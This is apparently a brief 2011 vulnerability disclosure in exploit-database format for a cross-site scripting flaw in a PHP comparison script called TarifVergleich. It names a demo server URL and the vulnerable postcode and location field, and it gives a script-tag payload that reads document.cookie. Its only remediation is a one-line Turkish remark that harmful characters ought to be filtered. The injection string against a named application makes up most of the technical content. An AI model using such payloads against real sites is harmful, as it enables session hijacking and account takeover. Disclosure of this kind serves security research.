< ------------------- header data start ------------------- >

# Application Name: TarifVergleich

# Author: Lynch ~ Bug Researchers

# Date: 19.08.2011

# Demo: http://www.media-products-demoserver.de/ph168/immobilienvergleich.php

# Vulnerable Type: Cross Site Scripting

# Fixed: Zararli Karakterler Filitrelenmelidir.


< -- bug code start -- >

http://victim/immobilienvergleich.php // Standort: PLZ und Ort* Box in XSS Attack

><script>alert(document.cookie)</script>

< -- bug code end of -- >

< ------------------- header data end of ------------------- >